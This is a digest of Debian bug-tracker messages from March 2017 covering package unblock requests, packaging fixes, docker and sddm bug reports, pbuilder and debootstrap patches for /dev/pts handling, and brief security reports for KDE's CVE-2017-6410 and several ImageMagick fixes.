ii  libc6  2.24-9

Versions of packages cryptsetup recommends:
ii  busybox 1:1.22.0-19+b1
ii  console-setup   1.163
ii  initramfs-tools [linux-initramfs-tool]  0.127
ii  kbd 2.0.3-2+b1

Versions of packages cryptsetup suggests:
ii  dosfstools  4.1-1
ii  keyutils1.5.9-9
ii  liblocale-gettext-perl  1.07-3+b1

-- debconf information:
  cryptsetup/prerm_active_mappings: true

Bug#856067: unblock: amavisd-new/1:2.10.1-4

[Brian May]

Jonathan Wiltshire  writes:

> Not in a point release, but I'll cut you a deal: if the underlying bug in
> libdbd-mysql-perl is fixed (but *without* the additional fixes Pali
> mentions), and an unblock bug opened before 1st March, I'll unblock
> amavisd-new and amavisd-milter for stretch.

libdbd-mysql-perl is fixed in testing now.

Can amavisd-new get unblocked?

Thanks

(oh amavisd-milter is a seperate package, seperate maintainer, no need
to unlock it)
-- 
Brian May 

Bug#856891: hitori: Drop obsolete menu and .xpm

[Jeremy Bicha]

Source: hitori
Version: 3.22.0-1
Severity: important

Please drop the Debian menu entry since the .desktop is the preferred
menu format in Debian.

This is as simple as dropping these files:
debian/hitori.xpm
debian/hitori.install
debian/menu

I am setting this issue as important because I believe the .xpm icon
is confusing the appstream generator used by Debian and Ubuntu which
prevents hitori from showing in the GNOME Software app (which is
included by default in Debian GNOME for Stretch).

https://appstream.debian.org/sid/main/issues/hitori.html

Thanks,
Jeremy Bicha

Bug#856890: kde4libs: CVE-2017-6410: Information Leak when accessing https when using a malicious PAC file

[Salvatore Bonaccorso]

Source: kde4libs
Version: 4:4.14.26-1
Severity: important
Tags: upstream patch security

Hi,

the following vulnerability was published for kde4libs.

CVE-2017-6410[0]:
| kpac/script.cpp in KDE kio before 5.32 and kdelibs before 4.14.30 calls
| the PAC FindProxyForURL function with a full https URL (potentially
| including Basic Authentication credentials, a query string, or
| PATH_INFO), which allows remote attackers to obtain sensitive
| information via a crafted PAC file.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2017-6410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6410
[1] https://commits.kde.org/kdelibs/1804c2fde7bf4e432c6cf5bb8cce5701c7010559
[2] https://www.kde.org/info/security/advisory-20170228-1.txt

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore

Bug#856889: kio: CVE-2017-6410: Information Leak when accessing https when using a malicious PAC file

[Salvatore Bonaccorso]

Source: kio
Version: 5.22.0-1
Severity: important
Tags: patch upstream security

Hi,

the following vulnerability was published for kio.

CVE-2017-6410[0]:
| kpac/script.cpp in KDE kio before 5.32 and kdelibs before 4.14.30 calls
| the PAC FindProxyForURL function with a full https URL (potentially
| including Basic Authentication credentials, a query string, or
| PATH_INFO), which allows remote attackers to obtain sensitive
| information via a crafted PAC file.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2017-6410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6410
[1] https://commits.kde.org/kio/f9d0cb47cf94e209f6171ac0e8d774e68156a6e4
[2] https://www.kde.org/info/security/advisory-20170228-1.txt

Regards,
Salvatore

Bug#855933: mod-gnutls: FTBFS: Test failures

[Thomas Klute]

Hi Daniel, hi Lucas,

I have pushed a suggested version 0.8.2-3 to the "for-debian" branch at
commit 266c7750aa4c1a25089d3ad79e4b5359b9342214 in my Github repository
[1]. I tried to keep the differences reasonably small, I hope the result
is acceptable during the freeze.

The set of changes assumes that (patch numbers refer to the numbered
file names in debian/patches, 0001 is already in 0.8.2-2):

* Verbose logging around the fixed bugs is desirable. That's why it
includes patches 0002 to 0004, just increasing the timeouts could be one
smaller patch.

* Not breaking compatibility for jessie-backports is desirable (patch
0005). Ironically, this could be dropped without the verbose logging
part above.

* Fixing the tests for hurd-i386 is desirable, even though it's not a
release architecture (patch 0006).

* The update will go through unstable (patch 0007 for compatibility with
GnuTLS 3.5.9).

Regards,
Thomas

[1] https://github.com/airtower-luna/mod_gnutls/commits/for-debian

Bug#856888: ITP: django-dirtyfields -- package for tracking dirty fields on a Django model instance

[Christopher Hoskin]

Package: wnpp
Severity: wishlist
Owner: Christopher Hoskin 

* Package name: django-dirtyfields
  Version : 1.2.1
  Upstream Author : Romain Garrigues 
* URL : https://github.com/romgar/django-dirtyfields
* License : BSD
  Programming Lang: Python
  Description : package for tracking dirty fields on a Django model instance

django-dirtyfields is a package for tracking dirty fields on a Django model
instance, where dirty means that field in-memory and database values are
different.

I plan to maintain it within the DPMT.

Christopher Hoskin

Bug#691763: Wish: Please support some low res (SDTV) skin

[Bálint Réczey]

Control: tags -1 moreinfo

Hi Philippe,

2014-01-06 17:49 GMT+01:00 Balint Reczey :
> tags 691763 wontfix
> thanks
>
> Dear Philippe,
>
> On 10/29/2012 02:22 PM, Philippe Coval wrote:
>> Package: xbmc
>> Version: 2:11.0~git20120510.82388d5-1
>> Severity: wishlist
>>
>> Dear Maintainer,
>>
>> I suppose that one can be forwarded upstream, I will do if needed
>>
>> Please support by default a SDTV (PAL/NTSC) skin if display is not large 
>> enough...
>>
>> There is a Project Mayem skin
>> but I am unsure it is supported or can be packaged separately ?
> XBMC from Debian supports all the skins which can be downloaded from
> XBMC's skin repository. You can download them at
> System->Settings->Appearance->Skin->Skin->Get More... .
>
> The Project Mayhem skin has been replaced by PM3.HD from the same team
> but it is optimized for high resolutions.
>
> If you find a suitable skin and you think that is should be packaged in
> Debian then please file and RFP bug for it. IMHO there would be little
> value in packaging additional skins since they are just XML files with
> images.
>
> If you don't find any suitable skin please ask upstream/skin developers
> to provide one, I can't help too much in this case.

The new default skin in Kodi 17 seems to work better on low-res devices.
What do you think? Is the new skin good enough to consider this problem solved?

Cheers,
Balint

Bug#856887: sddm default configuration is not properly taken

[Miguel Angel]

Package: sddm
Version: 0.13.0-1
Severity: important
Tags: upstream

Dear Maintainer,

sddm default "blue configuration" is not taking properly when the
packages is upgraded to version 0.14 or above (bad theme and wrong
configuration)

Downgrading to version 0.13 makes sddm usable again with the
default theme properly setup. Curious thing is when you lock your screen
with 0.14, the right blue default theme is displayed (?), but not in the logout.

If you need screenshots, just let me know, but it is very easy to
reproduce.

-- System Information:
Debian Release: 9.0
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages sddm depends on:
ii  adduser 3.115
ii  debconf [debconf-2.0]   1.5.60
ii  libc6   2.24-9
ii  libgcc1 1:6.3.0-8
ii  libpam0g1.1.8-3.5
ii  libqt5core5a5.7.1+dfsg-3+b1
ii  libqt5dbus5 5.7.1+dfsg-3+b1
ii  libqt5gui5  5.7.1+dfsg-3+b1
ii  libqt5network5  5.7.1+dfsg-3+b1
ii  libqt5qml5  5.7.1-2
ii  libqt5quick55.7.1-2
ii  libstdc++6  6.3.0-8
ii  libsystemd0 232-19
ii  libxcb-xkb1 1.12-1
ii  libxcb1 1.12-1
ii  qml-module-qtquick2 5.7.1-2
ii  sddm-theme-breeze [sddm-theme]  4:5.8.4-1

Versions of packages sddm recommends:
ii  libpam-systemd  232-19

Versions of packages sddm suggests:
ii  libpam-kwallet5  5.8.4-1

-- debconf information:
* shared/default-x-display-manager: sddm
  sddm/daemon_name: /usr/bin/sddm

Bug#856885: docker.io: Docker fails to listen on the expected unix socket

[Nicolas Braud-Santoni]

Package: docker.io
Version: 1.11.2~ds1-6
Severity: important

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Dear Maintainer,

docker, in its default configuration on stretch, is setup with systemd
socket activation.  The socket systemd listens to is
/var/run/docker.sock, but the current version of docker seems to
expect /var/run/docker/libcontainerd/docker-containerd.sock

The net result is that any docker-* operation hangs, making Docker unuseable.
Symlinking /var/run/docker/libcontainerd/docker-containerd.sock to
/var/run/docker.sock and restarting docker “solved” the issue.

I have no non-default configuration in /etc/docker or /etc/default/docker.

> % docker ps
> [hangs]
> 
> % systemctl status docker.service
> ● docker.service - Docker Application Container Engine
>Loaded: loaded (/lib/systemd/system/docker.service; disabled; vendor 
> preset: enabled)
>Active: activating (start) since Sun 2017-03-05 14:53:04 EST; 13s ago
>  Docs: https://docs.docker.com
>  Main PID: 27026 (docker)
> Tasks: 8
>Memory: 5.1M
>   CPU: 97ms
>CGroup: /system.slice/docker.service
>└─27026 /usr/bin/docker daemon -H fd://
> 
> Mar 05 14:53:04 harbard.iaik.tugraz.at systemd[1]: Starting Docker 
> Application Container Engine...
> Mar 05 14:53:04 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:53:04.983760764-05:00" level=info msg="New containerd 
> process, pid: 27032\n"
> Mar 05 14:53:05 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:53:05.001118207-05:00" level=fatal msg="bad listen 
> address format /var/run/docker/libcontainerd/docker-containerd.sock, expected 
> proto://address"
> Mar 05 14:53:10 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:53:10.986449214-05:00" level=info msg="New containerd 
> process, pid: 27053\n"
> Mar 05 14:53:11 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:53:11.011430719-05:00" level=fatal msg="bad listen 
> address format /var/run/docker/libcontainerd/docker-containerd.sock, expected 
> proto://address"
> Mar 05 14:53:21 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:53:21.289129964-05:00" level=info msg="New containerd 
> process, pid: 27065\n"
> Mar 05 14:53:21 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:53:21.309476765-05:00" level=fatal msg="bad listen 
> address format /var/run/docker/libcontainerd/docker-containerd.sock, expected 
> proto://address"
> Mar 05 14:53:38 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:53:38.734083204-05:00" level=info msg="New containerd 
> process, pid: 27097\n"
> Mar 05 14:53:38 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:53:38.752141814-05:00" level=fatal msg="bad listen 
> address format /var/run/docker/libcontainerd/docker-containerd.sock, expected 
> proto://address"
> Mar 05 14:53:57 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:53:57.324349682-05:00" level=info msg="New containerd 
> process, pid: 27128\n"
> Mar 05 14:53:57 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:53:57.349952538-05:00" level=fatal msg="bad listen 
> address format /var/run/docker/libcontainerd/docker-containerd.sock, expected 
> proto://address"
> Mar 05 14:55:08 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:55:08.828955857-05:00" level=info msg="New containerd 
> process, pid: 27174\n"
> Mar 05 14:55:08 harbard.iaik.tugraz.at docker[27026]: 
> time="2017-03-05T14:55:08.852871735-05:00" level=fatal msg="bad listen 
> address format /var/run/docker/libcontainerd/docker-containerd.sock, expected 
> proto://address"


Best,

  nicoo

- -- System Information:
Debian Release: 9.0
  APT prefers testing
  APT policy: (900, 'testing'), (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages docker.io depends on:
ii  adduser  3.115
ii  containerd   0.2.3~git20161117.78.03e5862~ds1-1
ii  init-system-helpers  1.47
ii  iptables 1.6.0+snapshot20161117-5
ii  libapparmor1 2.11.0-2
ii  libc62.24-9
ii  libdevmapper1.02.1   2:1.02.137-1
ii  libsqlite3-0 3.16.2-2
ii  libsystemd0  232-18
ii  runc 0.1.1+dfsg1-2

Versions of packages docker.io recommends:
ii  ca-certificates  20161130
ii  cgroupfs-mount   1.3
ii  git  1:2.11.0-2
ii  xz-utils 5.2.2-1.2+b1

Versions of packages docker.io suggests:
ii  aufs-tools 1:4.1+20161219-1
pn  btrfs-progs
ii  debootstrap1.0.88
pn  docker-doc 
pn  rinse  
ii  zfsutils-linux [zfsutils]  0.6.5.9-2

- -- no debconf information

-BEGIN PGP SIGNATURE-

Bug#856884: unblock: regina-rexx/3.6-2.1

[Adrian Bunk]

Package: release.debian.org
Severity: normal
User: release.debian@packages.debian.org
Usertags: unblock

Please unblock package regina-rexx

unblock regina-rexx/3.6-2.1

diffstat for regina-rexx-3.6 regina-rexx-3.6

 changelog  |   10 ++
 control|2 +-
 rules  |3 +++
 source/options |2 --
 4 files changed, 14 insertions(+), 3 deletions(-)

diff -Nru regina-rexx-3.6/debian/changelog regina-rexx-3.6/debian/changelog
--- regina-rexx-3.6/debian/changelog2012-06-30 19:24:40.0 +0300
+++ regina-rexx-3.6/debian/changelog2017-03-05 16:40:23.0 +0200
@@ -1,3 +1,13 @@
+regina-rexx (3.6-2.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use config.{guess,sub} from autotools-dev to fix FTBFS
+on arm64 and ppc64el. (Closes: #756354)
+  * Stop compressing the packages with "bzip2 -9",
+compression with the current default xz is better.
+
+ -- Adrian Bunk   Sun, 05 Mar 2017 16:40:23 +0200
+
 regina-rexx (3.6-2) unstable; urgency=low
 
   * Fixed debian/rules build target.
diff -Nru regina-rexx-3.6/debian/control regina-rexx-3.6/debian/control
--- regina-rexx-3.6/debian/control  2012-06-30 13:09:52.0 +0300
+++ regina-rexx-3.6/debian/control  2017-03-05 16:40:23.0 +0200
@@ -2,7 +2,7 @@
 Section: libs
 Priority: optional
 Maintainer: Alen Zekulic 
-Build-Depends: binutils, libncurses5-dev
+Build-Depends: binutils, libncurses5-dev, autotools-dev
 Standards-Version: 3.9.3
 Homepage: http://regina-rexx.sourceforge.net/
 
diff -Nru regina-rexx-3.6/debian/rules regina-rexx-3.6/debian/rules
--- regina-rexx-3.6/debian/rules2012-06-30 19:20:43.0 +0300
+++ regina-rexx-3.6/debian/rules2017-03-05 16:40:23.0 +0200
@@ -45,6 +45,8 @@
 configure: stamp-configure
 stamp-configure:
$(checkdir)
+   cp -f /usr/share/misc/config.sub common/
+   cp -f /usr/share/misc/config.guess common/
LDFLAGS="$(LDFLAGS)" ./configure $(confflags)
touch stamp-configure
 
@@ -55,6 +57,7 @@
-chmod 644 debian/md5_sums
-rm -f `find . \( -name '*~' -o -name '*.bak' \) -print`
-rm -rf core debian/tmp* debian/files* debian/*substvars 
debian/shlibs.local
+   rm -f common/config.sub common/config.guess
 
 binary-indep: checkroot build
$(checkdir)
diff -Nru regina-rexx-3.6/debian/source/options 
regina-rexx-3.6/debian/source/options
--- regina-rexx-3.6/debian/source/options   2009-11-30 21:35:33.0 
+0200
+++ regina-rexx-3.6/debian/source/options   1970-01-01 02:00:00.0 
+0200
@@ -1,2 +0,0 @@
-compression = "bzip2"
-compression-level = 9

Bug#856883: [src:imagemagick] Fixed fd leak for webp coder

[Bastien ROUCARIÈS]

Package: src:imagemagick
Version: 8:6.6.0.4-3
Severity: serious
Tags: security
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org
control: found -1 8:6.7.7.10-5
control: found -1 8:6.8.9.9-5

Does not affect debian due to webp not compiled by default. So not important

Fixed in 126c7c98ea788241922c30df4a5633ea692cf8df



signature.asc
Description: This is a digitally signed message part.

Bug#856882: [src:imagemagick] Added missing null check in psd coder

[Bastien ROUCARIÈS]

Package: src:imagemagick
Version: 8:6.6.0.4-3
Severity: serious
Tags: security
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org
control: found -1 8:6.7.7.10-5
control: found -1 8:6.8.9.9-5

Fixed in 7f2dc7a1afc067d0c89f12c82bcdec0445fb1b94



signature.asc
Description: This is a digitally signed message part.

Bug#856881: [src:imagemagick] Avoid null pointer dereference in xcf coder

[Bastien ROUCARIÈS]

Package: src:imagemagick
Version: 8:6.6.0.4-3
Severity: serious
Tags: security
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org
control: found -1 8:6.7.7.10-5
control: found -1 8:6.8.9.9-5

Fixed in d31fec57e9dfb0516deead2053a856e3c71e9751

From Андрей Черный

signature.asc
Description: This is a digitally signed message part.

Bug#841935: pbuilder: incorrect permissions on /dev/ptmx breaks openpty()

[Simon McVittie]

Control: unmerge -1
Control: severity -1 normal
Control: reassign -1 pbuilder

I'm decoupling this bug from debootstrap and making it non-RC because I
suspect the best long-term solution might be to solve it in pbuilder
*and* debootstrap, and debootstrap already has a RC bug representing
the need for a short-term fix.

On Sun, 06 Nov 2016 at 20:41:38 +, James Clarke wrote:
> newinstance seems to be a world of pain, as then it can’t access the TTY
> for std{in,out,err}. I tried many months ago and couldn’t get it to work,
> but would love to be proved wrong.

I agree with later commenters on this bug that it would be best for
debootstrap to create /dev/ptmx as a real device node and not a symlink,
and I have proposed a patch to do that. However, I don't think you can
avoid newinstance on recent kernels *anyway*: see

and compare with
.

So if you have trouble with interactive use under particular use cases,
you're going to have that same trouble with stretch kernels anyway -
unless you bind-mount the host's /dev/pts instead of mounting your own,
like schroot does, which comes with its own problems (in my testing it
didn't work inside an lxc container with the jessie kernel unless also
bind-mounting the host's (i.e. lxc's) /dev).

Also, as Marco noted on #817236, if invoking debootstrap in a container that
restricts device node creation (notably systemd-nspawn), /dev/ptmx
cannot be created as a real device node, and the only options are to
make it a symlink or to fail altogether. So it would seem like a good
long-term plan to make pbuilder tolerate that arrangement? Unfortunately,
this might involve setting up a pty between the user and the contained
processes, or using "script /dev/null".

I attach a possible patch that makes kernels >= 2.6.29 consistent with 4.7+.
By this point I've mostly lost track of whether it is a good idea or not :-(

Regards,
S
>From 08fae768f94ab692b4481f0953a0a060cee3fb4d Mon Sep 17 00:00:00 2001
From: Simon McVittie 
Date: Mon, 20 Feb 2017 09:58:12 +
Subject: [PATCH] pbuilder-modules: Set up /dev/ptmx, /dev/pts for modern Linux

Mounting a new instance of /dev/pts is best-practice in all Linux
versions since v2.6.29, but will not actually work in all configurations
of those kernels prior to v4.7.

See the new comments for the gory details.

Signed-off-by: Simon McVittie 
---
 pbuilder-modules | 37 -
 1 file changed, 36 insertions(+), 1 deletion(-)

diff --git a/pbuilder-modules b/pbuilder-modules
index 18e14b5..3b74d49 100644
--- a/pbuilder-modules
+++ b/pbuilder-modules
@@ -276,6 +276,7 @@ function umountproc () {
 umount_one "$SELINUX"
 fi
 if [ "$DEB_BUILD_ARCH_OS" = "linux" ] && [ "$USEDEVPTS" = "yes" ]; then
+umount_one "dev/ptmx"
 umount_one "dev/pts"
 fi
 if [ "$DEB_BUILD_ARCH_OS" = "kfreebsd" ] || [ "$USEDEVFS" = "yes" ]; then
@@ -383,8 +384,42 @@ function mountproc () {
 TTYGRP=5
 TTYMODE=620
 [ -f /etc/default/devpts ] && . /etc/default/devpts
-mount -t devpts none "$BUILDPLACE/dev/pts" -onoexec,nosuid,gid=$TTYGRP,mode=$TTYMODE
+# There are three possibilities here:
+# - Modern (Linux >= 4.7): /dev/pts is always a new instance,
+#   and opening /dev/ptmx really opens /dev/pts/ptmx.
+#   The first mount attempt will succeed.
+# - Awkward transitional period (Linux < 4.7 with
+#   CONFIG_DEVPTS_MULTIPLE_INSTANCES=y): /dev/pts can be a new
+#   instance but is not by default. We want to mount a new
+#   instance, but if we do that, we must ensure that /dev/ptmx is
+#   a symbolic link to /dev/pts/ptmx or a bind-mount of
+#   /dev/pts/ptmx, and that /dev/pts/ptmx has usable permissions
+#   (which for some reason it does not by default).
+#   The first mount attempt will succeed.
+# - Legacy mode (Linux < 2.6.29, or < 4.7 with
+#   CONFIG_DEVPTS_MULTIPLE_INSTANCES=n): /dev/pts is not
+#   virtualized at all. The second mount attempt will succeed.
+#   /dev/pts/ptmx will not exist.
+local devpts_options="noexec,nosuid,gid=$TTYGRP,mode=$TTYMODE"
+if ! mount -t devpts none "$BUILDPLACE/dev/pts" -o "$devpts_options,newinstance,ptmxmode=666"; then
+mount -t devpts none "$BUILDPLACE/dev/pts" -o "$devpts_options"
+fi
 mounted[${#mounted[@]}]="$BUILDPLACE/dev/pts"
+# Depending on how /dev was set up, /dev/ptmx might either be
+# character device (5,2), or a symbolic link to pts/ptmx.
+# For the transitional case, we want it to be equivalent to
+# /dev/pts/ptmx, but we can't do that unconditionally because
+# in the legacy case, /dev/pts/ptmx won't exist.
+# If ptmx is a 

Bug#856880: [src:imagemagick] Fixed memory leak when creating nested exceptions in Magick++

[Bastien ROUCARIÈS]

Package: src:imagemagick
Version: 8:6.6.0.4-3
Severity: serious
Tags: security
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org
control: found -1 8:6.7.7.10-5
control: found -1 8:6.8.9.9-5
forwarded: 
https://www.imagemagick.org/discourse-server/viewtopic.php?f=23=142634

Fixed in 3358f060fc182551822576b2c0a8850faab5d543

signature.asc
Description: This is a digitally signed message part.

Bug#856843: [Pkg-samba-maint] Bug#856843: smbclient: connection flood to port 445 on mounting cifs volume under kernel 4.9.0

[Nils]

Then this is a kernel issue, I assumed that cifsd was part of smbclient
and I see that taking up resources, but maybe that is unrelated (it was
in a normal resource usage range).

Please reassign as you think appropriate.


On 2017-03-05 14:36, Jelmer Vernooij wrote:
> On Sun, Mar 05, 2017 at 12:30:33PM +0100, nils wrote:
>> Package: smbclient
>> Version: 2:4.2.14+dfsg-0+deb8u2
>> Severity: important
>>
>> Hello,
>> after upgrading my kernel from 4.0.8 to 4.0.9 I am getting connection floods 
>> to
>> my FreeNAS samba server from my debian machine. I never had this issue with
>> 4.0.8
>>
>> Linux dnet64 4.9.0-0.bpo.1-amd64 #1 SMP Debian 4.9.2-2~bpo8+1 (2017-01-26)
>> x86_64 GNU/Linux
>> ii  smbclient  2:4.2.14+dfsg-0+deb8u2   amd64command-line
>> SMB/CIFS clients for Unix
>>
>> After mouting the cifs share(s) everything is OK for about 10 minutes, then a
>> flood of connections happens. Here is an extract of 'netstat -an' run every
>> second. Only one or two connections are shown for every 'netstat -an' run. 
>> The
>> connections are opening and closing at an incredible speed (nethogs goes to
>> 100% and doesn't show anything because it's overwhelmed). gkrellm reports 
>> about
>> 70k/Sec traffic due to this. See how the source port numbers increase
>> increadibly quickly to get an idea of how many connections are really
>> happening...
>> 
>> tcp0  1 10.0.2.15:55044 192.168.2.88:445SYN_SENT
>> tcp0  1 10.0.2.15:55252 192.168.2.88:445SYN_SENT
>> tcp0  0 10.0.2.15:55288 192.168.2.88:445
>> ESTABLISHED
>> tcp0  1 10.0.2.15:55314 192.168.2.88:445SYN_SENT
>> tcp0  1 10.0.2.15:55348 192.168.2.88:445SYN_SENT
>> tcp0  0 10.0.2.15:55396 192.168.2.88:445
>> ESTABLISHED
>> tcp0  1 10.0.2.15:55454 192.168.2.88:445SYN_SENT
>> tcp0  0 10.0.2.15:55500 192.168.2.88:445
>> ESTABLISHED
>> tcp0  0 10.0.2.15:55544 192.168.2.88:445
>> ESTABLISHED
>> tcp0 42 10.0.2.15:55586 192.168.2.88:445
>> ESTABLISHED
>> tcp0  0 10.0.2.15:55630 192.168.2.88:445
>> ESTABLISHED
>> tcp0  0 10.0.2.15:55676 192.168.2.88:445
>> ESTABLISHED
>> tcp0  0 10.0.2.15:55720 192.168.2.88:445
>> ESTABLISHED
>> tcp0  1 10.0.2.15:55770 192.168.2.88:445SYN_SENT
>> tcp1  0 10.0.2.15:55820 192.168.2.88:445
>> CLOSE_WAIT
>> tcp0  1 10.0.2.15:55868 192.168.2.88:445SYN_SENT
>> tcp0  0 10.0.2.15:55912 192.168.2.88:445
>> ESTABLISHED
>> tcp0  0 10.0.2.15:55962 192.168.2.88:445
>> ESTABLISHED
>> tcp1  0 10.0.2.15:56010 192.168.2.88:445
>> CLOSE_WAIT
>> tcp0  1 10.0.2.15:56058 192.168.2.88:445SYN_SENT
>> tcp0  0 10.0.2.15:56056 192.168.2.88:445LAST_ACK
>> tcp0  0 10.0.2.15:56104 192.168.2.88:445
>> ESTABLISHED
>> tcp0  0 10.0.2.15:56162 192.168.2.88:445
>> ESTABLISHED
>> tcp0  0 10.0.2.15:56202 192.168.2.88:445
>> ESTABLISHED
>> tcp0  1 10.0.2.15:56246 192.168.2.88:445SYN_SENT
>> tcp0  0 10.0.2.15:56290 192.168.2.88:445
>> ESTABLISHED
>> etc.
>>
>> Rebooting in 4.0.8 makes the issue go away, and I can have the shares mounted
>> as long as I want without a connection flood. Hence I assume that it's a
>> smbclient + Kernel 4.0.9 issue
> smbclient is a command-line tool, if you're just mounting CIFS shares then 
> this
> is an issue in the kernel rather than in smbclient.
>
> Jelmer

Bug#856879: [src:imagemagick] out-of-bounds read

[Bastien ROUCARIÈS]

Package: src:imagemagick
Version: 8:6.6.0.4-3
Severity: serious
Tags: security
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org
control: found -1 8:6.7.7.10-5
control: found -1 8:6.8.9.9-5
forwarded: https://github.com/ImageMagick/ImageMagick/issues/375

See also https://github.com/ImageMagick/ImageMagick/issues/376

Fixed in 3007531bfd326c5c1e29cd41d2cd80c166de8528

signature.asc
Description: This is a digitally signed message part.

Bug#856878: [src:imagemagick] Assertion failure in TGA coder

[Bastien ROUCARIÈS]

Package: src:imagemagick
Version: 8:6.6.0.4-3
Severity: serious
Tags: security
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org
control: found -1 8:6.7.7.10-5
control: found -1 8:6.8.9.9-5
forwarded: https://github.com/ImageMagick/ImageMagick/pull/359.

Fixed in 65f75a32a93ae4044c528a987a68366ecd4b46b9. Low impact (DOS only)

signature.asc
Description: This is a digitally signed message part.

Bug#817236: schroot: no access to pseudo-terminals in new chroots

[Simon McVittie]

I have filed #856877 against schroot suggesting mounting a new instance
of /dev/pts, effectively making schroot behave less like chroot and more
like a container manager in this particular respect.

However, that causes a nasty regression for interactive use (ttyname()
won't report that the interactive tty outside the container is a tty,
because it has no name inside the container), so I don't think it can
be applied unless schroot also changes to give the invoked shell a
pty inside the container as its stdin/stdout/stderr
(like systemd-nspawn does).

So I think it is best if this is solved in debootstrap, to the extent
that it can be.

I attach extended test coverage in debootstrap's autopkgtests for what
I've proposed schroot should consider doing, and for what I'm going to
propose pbuilder does. Up to you whether these are applied or not,
given the down side for interactive use, but I've successfully tested
them in a sid lxc container (lxc from jessie-backports, under the jessie
kernel), in a sid qemu VM (with sid kernel), and in a sid schroot (in
a jessie VM with the jessie kernel).

S
>From 6890fea3e31910b03996812072da2900d1735e95 Mon Sep 17 00:00:00 2001
From: Simon McVittie 
Date: Sun, 5 Mar 2017 17:41:32 +
Subject: [PATCH 1/2] autopkgtest: Exercise possible future pbuilder behaviour

---
 debian/tests/debian-testing | 13 +++
 debian/tests/fake/pbuilder-proposed | 43 +
 2 files changed, 52 insertions(+), 4 deletions(-)
 create mode 100755 debian/tests/fake/pbuilder-proposed

diff --git a/debian/tests/debian-testing b/debian/tests/debian-testing
index fb7da66..928e4e1 100755
--- a/debian/tests/debian-testing
+++ b/debian/tests/debian-testing
@@ -35,10 +35,13 @@ sub capture {
 sub check_fake_schroot {
 my %params = @_;
 my $reference = $params{reference};
+my $version = $params{version} || '1.6.10-3';
 my $extra_argv = $params{extra_argv} || [];
 
+# Use unshare -m to make sure the /dev mount gets cleaned up on exit, even
+# on failures
 my $response = capture([qw(unshare -m),
-"$srcdir/debian/tests/fake/schroot-1.6.10-3", @{$extra_argv},
+"$srcdir/debian/tests/fake/schroot-$version", @{$extra_argv},
 $params{chroot},
 qw(runuser -u nobody --),
 qw(script -q -c), 'cat /etc/debian_version', '/dev/null']);
@@ -49,9 +52,10 @@ sub check_fake_schroot {
 sub check_fake_pbuilder {
 my %params = @_;
 my $reference = $params{reference};
+my $version = $params{version} || '0.228.4-1';
 
 my $response = capture([qw(unshare -m),
-"$srcdir/debian/tests/fake/pbuilder-0.228.4-1", $params{chroot},
+"$srcdir/debian/tests/fake/pbuilder-$version", $params{chroot},
 qw(runuser -u nobody --),
 qw(script -q -c), 'cat /etc/debian_version', '/dev/null']);
 $response =~ s/\r//g;
@@ -108,8 +112,6 @@ sub check_chroot {
 cat /etc/debian_version)]),
 $reference);
 
-# Use unshare -m to make sure the /dev mount gets cleaned up on exit, even
-# on failures
 check_fake_schroot(%params, reference => $reference);
 
 # https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=817236
@@ -135,6 +137,9 @@ sub check_chroot {
 extra_argv => ['--sbuild']);
 }
 
+check_fake_pbuilder(%params, reference => $reference,
+version => 'proposed');
+
 # https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=817236
 if (! $params{can_mknod_ptmx}) {
 TODO: {
diff --git a/debian/tests/fake/pbuilder-proposed b/debian/tests/fake/pbuilder-proposed
new file mode 100755
index 000..cea60b7
--- /dev/null
+++ b/debian/tests/fake/pbuilder-proposed
@@ -0,0 +1,43 @@
+#!/bin/sh
+# fake/pbuilder-proposed -- emulate how pbuilder is proposed to chroot in
+# future.
+#
+# Copyright © 2017 Simon McVittie
+# SPDX-License-Identifier: MIT
+# (see debian/copyright)
+
+set -e
+
+BUILDPLACE="$1"
+shift
+if test -z "$BUILDPLACE" || test -z "$1"; then
+	echo "Usage: $0 CHROOT COMMAND...">&2
+	exit 2
+fi
+
+devpts_options="noexec,nosuid,gid=5,mode=620"
+
+mkdir -p "$BUILDPLACE/dev/pts"
+if ! mount -t devpts none "$BUILDPLACE/dev/pts" -o "$devpts_options,newinstance,ptmxmode=666"; then
+mount -t devpts none "$BUILDPLACE/dev/pts" -o "$devpts_options"
+fi
+
